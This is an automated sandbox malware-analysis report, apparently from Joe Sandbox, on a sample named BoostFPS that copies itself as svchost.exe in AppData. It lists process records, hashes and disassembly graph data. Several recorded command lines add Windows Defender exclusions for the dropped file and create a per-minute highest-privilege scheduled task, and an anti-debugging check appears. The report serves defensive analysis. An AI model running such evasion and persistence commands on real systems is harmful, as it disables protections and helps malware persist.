                                                      General

                                                      Target ID:7
                                                      Start time:04:37:04
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
                                                      Imagebase:0x7ff79cc40000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:04:37:07
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:04:37:08
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:04:37:14
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:04:37:14
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:04:37:25
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:04:37:25
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:17
                                                      Start time:04:37:42
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                      Imagebase:0x7ff7be880000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:04:37:42
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:19
                                                      Start time:04:38:06
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                                                      Imagebase:0x7ff74cf10000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:04:38:06
                                                      Start date:20/11/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6d64d0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:04:38:06
                                                      Start date:20/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Imagebase:0x360000
                                                      File size:78'848 bytes
                                                      MD5 hash:A50564ADE45C0A409BB38C06673D6AB9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:22
                                                      Start time:04:38:18
                                                      Start date:20/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                      Imagebase:0x8e0000
                                                      File size:78'848 bytes
                                                      MD5 hash:A50564ADE45C0A409BB38C06673D6AB9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:23
                                                      Start time:04:38:26
                                                      Start date:20/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                      Imagebase:0xdd0000
                                                      File size:78'848 bytes
                                                      MD5 hash:A50564ADE45C0A409BB38C06673D6AB9
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:24
                                                      Start time:04:39:01
                                                      Start date:20/11/2024
                                                      Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                      Imagebase:0x130000
                                                      File size:78'848 bytes
                                                      MD5 hash:A50564ADE45C0A409BB38C06673D6AB9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 00007FF848DA0F81 Relevance: .5, Instructions: 453COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: abc87ad00e30a04f15116e6e13c1ed469bd817c14505be5224cb7d3b2ecf2a85
                                                        • Instruction ID: 482968ebb5eab78334bcdbe80eb39e8818bf8699c6086cdf0b415476d02f1438
                                                        • Opcode Fuzzy Hash: abc87ad00e30a04f15116e6e13c1ed469bd817c14505be5224cb7d3b2ecf2a85
                                                        • Instruction Fuzzy Hash: 8A414831E0EA899FEB95AB2858586B87BF1FF5A781F1400B7D04DC3193DE289C4A8305
                                                        Function 00007FF848DA10ED Relevance: .4, Instructions: 430COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8a1aa4dcbf1e05c0a57654a11d5d42da069fd6974e87df4e3f64b008ea1cb337
                                                        • Instruction ID: 47f42fda24964d0bbf990401163d36f0ac366e7e22fd44d29d1386db9a99ac43
                                                        • Opcode Fuzzy Hash: 8a1aa4dcbf1e05c0a57654a11d5d42da069fd6974e87df4e3f64b008ea1cb337
                                                        • Instruction Fuzzy Hash: BE31E621E0EAC95FDB85AB2898597B87BE1FF5A641F1400BBD44DC3293EE189C05C311
                                                        Function 00007FF848DA09F7 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 55a304da0752012af271f156e27a265a301a9e63edc7c6905c0a4b4ed9b4d038
                                                        • Instruction ID: 562b81d1043eecc9c68181330ac1f294ea7dc12f23028fe28d0d738e821b29cc
                                                        • Opcode Fuzzy Hash: 55a304da0752012af271f156e27a265a301a9e63edc7c6905c0a4b4ed9b4d038
                                                        • Instruction Fuzzy Hash: 30714C30A19909CFEB98FB68C458BAD77E2FF54354F640268E05AD32D5DF38AC458B44
                                                        Function 00007FF848DA0D80 Relevance: .1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4be0b980702d2b1c9b5c1db3ac129e86c3c8dbc072bcf363a07227a01560349
                                                        • Instruction ID: 00f402a66a9eeb89e7463ed0346215a231ee9e72b69e3f9c853c1259ed046992
                                                        • Opcode Fuzzy Hash: b4be0b980702d2b1c9b5c1db3ac129e86c3c8dbc072bcf363a07227a01560349
                                                        • Instruction Fuzzy Hash: 95319A6288E3C29FD343A7705C664A17FB09E47260B0E40DBD4C4CB4E3E51C6A9AC762
                                                        Function 00007FF848DA0498 Relevance: .1, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e7e33d22d61c3fc9c281ce841bdcfa0855a2e85ce58fbbe10891fbb755eff661
                                                        • Instruction ID: f11a475ace9a3207403b86bd2107e5f7bf872c3f4c91ee3e5c84e0d36b1a922e
                                                        • Opcode Fuzzy Hash: e7e33d22d61c3fc9c281ce841bdcfa0855a2e85ce58fbbe10891fbb755eff661
                                                        • Instruction Fuzzy Hash: FF21A131F1994D9FEB84FB2C98996BD73E2EF9C781F44007AE40EC3296DE25A8458740
                                                        Function 00007FF848DA0951 Relevance: .1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7764e35b00a7182261b823b4f3cfd49dfaa473483706d679548b51938d72a63e
                                                        • Instruction ID: c6c855f765335e5a992e1d65861336e3600dd8e406676484450cb91ba1db043e
                                                        • Opcode Fuzzy Hash: 7764e35b00a7182261b823b4f3cfd49dfaa473483706d679548b51938d72a63e
                                                        • Instruction Fuzzy Hash: 6911AC70C09B488FEB44EF68C4493EEBBF1FF58310F28416AD404A7282DB79994A8B41
                                                        Function 00007FF848DA0E71 Relevance: .1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee79feb075751abaa7bed0e21c43670376b531529f6aabd322280654e2b1cb44
                                                        • Instruction ID: b9d7b457cdd026661af5cdf3cd815e25ef80ffd3e83b2e1cc5c01f5c7470b1c9
                                                        • Opcode Fuzzy Hash: ee79feb075751abaa7bed0e21c43670376b531529f6aabd322280654e2b1cb44
                                                        • Instruction Fuzzy Hash: 9C012630A1EA498FD798F73894916B833D1EF88B40F140475C549C3386DF2CEC468781
                                                        Function 00007FF848DA0EF9 Relevance: .1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eb691877f235629cab88592b88c18b12735f846a9ec51970f1dfd099764552bc
                                                        • Instruction ID: 4623011814268f2b7cf7d2f38ceb251a0c3dac9fd50d57ddbfbb303e55a8eae7
                                                        • Opcode Fuzzy Hash: eb691877f235629cab88592b88c18b12735f846a9ec51970f1dfd099764552bc
                                                        • Instruction Fuzzy Hash: 7801B122D0F6859FF750B778685A2B4ABE0EF56780F1900F6D449C3092EE58AC498315
                                                        Function 00007FF848DA04B0 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c1496d1e7d30c675fcc9e68f640bc1161cc456c5df916e8262e354f148157e4
                                                        • Instruction ID: fa48626f0e9b796c660f3a42c39039e8639c5f2da4ec897fe7938d7983b686c5
                                                        • Opcode Fuzzy Hash: 3c1496d1e7d30c675fcc9e68f640bc1161cc456c5df916e8262e354f148157e4
                                                        • Instruction Fuzzy Hash: 58F0AF30B2EA199FD698F73C944567973D2EB88B80F600579D54EC3385DF2CE8428785
                                                        Function 00007FF848DA04A8 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 73e02c6dd2af4200d8c173963e5b821ac25c958ca98cb2806c76b43572d534cb
                                                        • Instruction ID: afde57f31700feb5a1848694a7ea424112600e0b5a2dede62679bd4c45a16d4c
                                                        • Opcode Fuzzy Hash: 73e02c6dd2af4200d8c173963e5b821ac25c958ca98cb2806c76b43572d534cb
                                                        • Instruction Fuzzy Hash: 77F0F420A1F65A9FD758F63C94416B973C1EF88780F200575D50DC3286DE2CE8418784
                                                        Function 00007FF848DA0F3F Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2102207344.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848da0000_BoostFPS.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 334a65fa533e0c4275b1978e5e4a502540d3136e55c847c6cef847b8b09dfabb
                                                        • Instruction ID: a22ad15b67f62e2a746865041ce57ca135670fd80d07742e57f91918b0338506
                                                        • Opcode Fuzzy Hash: 334a65fa533e0c4275b1978e5e4a502540d3136e55c847c6cef847b8b09dfabb
                                                        • Instruction Fuzzy Hash: 1EE0CD11F1EE094FF798767C34563B5A7C2DB89B51F500039E00EC32CBDD599C824245

                                                        Execution Graph

                                                        Execution Coverage:24.3%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:33.3%
                                                        Total number of Nodes:9
                                                        Total number of Limit Nodes:0

                                                        Executed Functions

                                                        Function 00007FF848DAE5D8 Relevance: 2.5, Strings: 1, Instructions: 1206COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 8 7ff848dae5d8-7ff848dae5f3 10 7ff848dae5f5-7ff848dae600 call 7ff848da0a40 8->10 11 7ff848dae63d-7ff848dae645 8->11 15 7ff848dae605-7ff848dae63c 10->15 12 7ff848dae647-7ff848dae664 11->12 13 7ff848dae6bb 11->13 17 7ff848dae6c0-7ff848dae6d5 12->17 18 7ff848dae666-7ff848dae6b6 call 7ff848dac250 12->18 13->17 15->11 21 7ff848dae6f3-7ff848dae708 17->21 22 7ff848dae6d7-7ff848dae6ee call 7ff848da1228 call 7ff848da0a50 17->22 45 7ff848daf2fb-7ff848daf309 18->45 31 7ff848dae70a-7ff848dae73a call 7ff848da1228 21->31 32 7ff848dae73f-7ff848dae754 21->32 22->45 31->45 40 7ff848dae756-7ff848dae762 call 7ff848dabdd8 32->40 41 7ff848dae767-7ff848dae77c 32->41 40->45 50 7ff848dae7c2-7ff848dae7d7 41->50 51 7ff848dae77e-7ff848dae781 41->51 56 7ff848dae818-7ff848dae82d 50->56 57 7ff848dae7d9-7ff848dae7dc 50->57 51->13 52 7ff848dae787-7ff848dae792 51->52 52->13 53 7ff848dae798-7ff848dae7bd call 7ff848da0a28 call 7ff848dabdd8 52->53 53->45 64 7ff848dae85a-7ff848dae86f 56->64 65 7ff848dae82f-7ff848dae832 56->65 57->13 59 7ff848dae7e2-7ff848dae7ed 57->59 59->13 62 7ff848dae7f3-7ff848dae813 call 7ff848da0a28 call 7ff848daad60 59->62 62->45 73 7ff848dae947-7ff848dae95c 64->73 74 7ff848dae875-7ff848dae8c1 call 7ff848da09b0 64->74 65->13 67 7ff848dae838-7ff848dae855 call 7ff848da0a28 call 7ff848daad68 65->67 67->45 82 7ff848dae97b-7ff848dae990 73->82 83 7ff848dae95e-7ff848dae961 73->83 74->13 108 7ff848dae8c7-7ff848dae8ff call 7ff848da7700 74->108 92 7ff848dae9b2-7ff848dae9c7 82->92 93 7ff848dae992-7ff848dae995 82->93 83->13 85 7ff848dae967-7ff848dae976 call 7ff848daad40 83->85 85->45 98 7ff848dae9e7-7ff848dae9fc 92->98 99 7ff848dae9c9-7ff848dae9e2 92->99 93->13 94 7ff848dae99b-7ff848dae9ad call 7ff848daad40 93->94 94->45 105 7ff848dae9fe-7ff848daea17 98->105 106 7ff848daea1c-7ff848daea31 98->106 99->45 105->45 112 7ff848daea33-7ff848daea4c 106->112 113 7ff848daea51-7ff848daea66 106->113 108->13 125 7ff848dae905-7ff848dae942 call 7ff848dabe08 108->125 112->45 117 7ff848daea68-7ff848daea6b 113->117 118 7ff848daea8f-7ff848daeaa4 113->118 117->13 120 7ff848daea71-7ff848daea8a 117->120 126 7ff848daeb44-7ff848daeb59 118->126 127 7ff848daeaaa-7ff848daeb22 118->127 120->45 125->45 133 7ff848daeb71-7ff848daeb86 126->133 134 7ff848daeb5b-7ff848daeb6c 126->134 127->13 155 7ff848daeb28-7ff848daeb3f 127->155 140 7ff848daec26-7ff848daec3b 133->140 141 7ff848daeb8c-7ff848daec04 133->141 134->45 148 7ff848daec53-7ff848daec68 140->148 149 7ff848daec3d-7ff848daec4e 140->149 141->13 174 7ff848daec0a-7ff848daec21 141->174 157 7ff848daec9a-7ff848daecaf 148->157 158 7ff848daec6a-7ff848daec95 call 7ff848da0d40 call 7ff848dac250 148->158 149->45 155->45 164 7ff848daecb5-7ff848daed87 call 7ff848da0d40 call 7ff848dac250 157->164 165 7ff848daed8c-7ff848daeda1 157->165 158->45 164->45 172 7ff848daeda7-7ff848daedaa 165->172 173 7ff848daee68-7ff848daee7d 165->173 176 7ff848daedb0-7ff848daedbb 172->176 177 7ff848daee5d-7ff848daee62 172->177 183 7ff848daee91-7ff848daeea6 173->183 184 7ff848daee7f-7ff848daee8c call 7ff848dac250 173->184 174->45 176->177 180 7ff848daedc1-7ff848daee5b call 7ff848da0d40 call 7ff848dac250 176->180 189 7ff848daee63 177->189 180->189 193 7ff848daeea8-7ff848daeeb9 183->193 194 7ff848daef1d-7ff848daef32 183->194 184->45 189->45 193->13 200 7ff848daeebf-7ff848daeecf call 7ff848da0a20 193->200 202 7ff848daef72-7ff848daef87 194->202 203 7ff848daef34-7ff848daef37 194->203 216 7ff848daeed1-7ff848daeef6 call 7ff848dac250 200->216 217 7ff848daeefb-7ff848daef18 call 7ff848da0a20 call 7ff848da0a28 call 7ff848daad18 200->217 214 7ff848daef89-7ff848daefc8 call 7ff848da8f50 call 7ff848daa150 call 7ff848daad20 202->214 215 7ff848daefcd-7ff848daefe2 202->215 203->13 207 7ff848daef3d-7ff848daef6d call 7ff848da0a18 call 7ff848da0a28 call 7ff848daad18 203->207 207->45 214->45 231 7ff848daf082-7ff848daf097 215->231 232 7ff848daefe8-7ff848daf07d call 7ff848da0d40 call 7ff848dac250 215->232 216->45 217->45 231->45 245 7ff848daf09d-7ff848daf0a4 231->245 232->45 251 7ff848daf0a6-7ff848daf0b0 call 7ff848dabe18 245->251 252 7ff848daf0b7-7ff848daf1d1 call 7ff848dabe28 call 7ff848dabe38 call 7ff848dabe48 call 7ff848dabe58 call 7ff848da9fe0 call 7ff848dabe68 call 7ff848dabe38 call 7ff848dabe48 245->252 251->252 300 7ff848daf242-7ff848daf251 252->300 301 7ff848daf1d3-7ff848daf1d7 252->301 302 7ff848daf258-7ff848daf2fa call 7ff848da0d40 call 7ff848da0a30 call 7ff848dac250 300->302 301->302 303 7ff848daf1d9-7ff848daf22a call 7ff848dabe78 call 7ff848dabe88 301->303 302->45 313 7ff848daf22f-7ff848daf238 303->313 313->300
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 9349a5aec3edfebfed8dc96ac8edfd3d76e14db8dae15629458948e7842b1329
                                                        • Instruction ID: d5937bafa6b827152ab592fadc739b2317a259f16d8ce5004a8d6f313be29d07
                                                        • Opcode Fuzzy Hash: 9349a5aec3edfebfed8dc96ac8edfd3d76e14db8dae15629458948e7842b1329
                                                        • Instruction Fuzzy Hash: 1E826330F1E60A8FEB98FB28849677972D2FF98344F644578D41EC32C6DF28A8468745
                                                        Function 00007FF848DA7A81 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 476 7ff848da7a81-7ff848da7a9a 477 7ff848da7ae4-7ff848da7b3d CheckRemoteDebuggerPresent 476->477 478 7ff848da7a9c-7ff848da7ae3 476->478 482 7ff848da7b45-7ff848da7b88 477->482 483 7ff848da7b3f 477->483 478->477 483->482
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        • Opcode ID: 779cee0f4aab9621a28fbd3853c426863497de3f6b21bd1914e68158aceacd62
                                                        • Instruction ID: ac9d96a0688159bac9c56facc0e1f1b76689bd40ecf4870e38e383d978ece6d8
                                                        • Opcode Fuzzy Hash: 779cee0f4aab9621a28fbd3853c426863497de3f6b21bd1914e68158aceacd62
                                                        • Instruction Fuzzy Hash: 9531FF3190C7588FCB58DF5888867E97BE0FF65321F14426AD489D7282DB34A8568B91
                                                        Function 00007FF848DA1290 Relevance: .7, Instructions: 746COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 755 7ff848da1290-7ff848da170b 758 7ff848da170d-7ff848da1715 755->758 759 7ff848da177c-7ff848da1780 755->759 760 7ff848da178c-7ff848da1885 call 7ff848da0638 * 6 call 7ff848da0a48 759->760 761 7ff848da1787 call 7ff848da0638 759->761 791 7ff848da1887-7ff848da188e 760->791 792 7ff848da188f-7ff848da1906 call 7ff848da04b8 call 7ff848da04b0 call 7ff848da0358 call 7ff848da0368 760->792 761->760 791->792 807 7ff848da1919-7ff848da1929 792->807 808 7ff848da1908-7ff848da1912 792->808 811 7ff848da1951-7ff848da1971 807->811 812 7ff848da192b-7ff848da194a call 7ff848da0358 807->812 808->807 818 7ff848da1973-7ff848da197d call 7ff848da0378 811->818 819 7ff848da1982-7ff848da19e6 call 7ff848da1038 811->819 812->811 818->819 830 7ff848da1a86-7ff848da1b14 819->830 831 7ff848da19ec-7ff848da1a81 819->831 850 7ff848da1b1b-7ff848da1c59 call 7ff848da0870 call 7ff848da1288 call 7ff848da0388 call 7ff848da0398 830->850 831->850 874 7ff848da1ca7-7ff848da1cda 850->874 875 7ff848da1c5b-7ff848da1c8e 850->875 885 7ff848da1cdc-7ff848da1cfd 874->885 886 7ff848da1cff-7ff848da1d2f 874->886 875->874 882 7ff848da1c90-7ff848da1c9d 875->882 882->874 887 7ff848da1c9f-7ff848da1ca5 882->887 888 7ff848da1d37-7ff848da1d6e 885->888 886->888 887->874 895 7ff848da1d70-7ff848da1d91 888->895 896 7ff848da1d93-7ff848da1dc3 888->896 897 7ff848da1dcb-7ff848da1ead call 7ff848da03a8 call 7ff848da09e8 call 7ff848da1038 895->897 896->897 916 7ff848da1eb4-7ff848da1f4d 897->916 917 7ff848da1eaf call 7ff848da1220 897->917 917->916
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.3328992642.00007FF848DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_7ff848da0000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4ab0a3fc7d63b9f42bb85ac10d5a7e15b966ab54816bb42afb3e43e0d59d755f
                                                        • Instruction ID: bdb363ac933fb69bbca0322f08ef93efe621b1267a096d22eb8efc2c81369560
